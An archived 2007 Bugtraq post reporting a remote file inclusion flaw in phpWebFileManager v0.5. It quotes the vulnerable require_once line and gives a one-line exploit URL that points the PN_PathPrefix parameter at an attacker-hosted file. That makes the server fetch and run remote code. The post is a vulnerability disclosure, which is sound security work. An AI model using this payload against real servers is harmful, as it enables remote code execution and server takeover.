NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2007-07

phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability

ilkerkandemirmynet.com
Date: Mon Jul 30 2007 - 14:10:33 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-------------------------------------------------------------------------------------------------------------------

MEFISTO PreSents...

Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once $PN_PathPrefix . 'functions.inc.php'; <<==== it's not defined

-------------------------------------------------------------------------------------------------------------------

Exploit: index.php?PN_PathPrefix=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]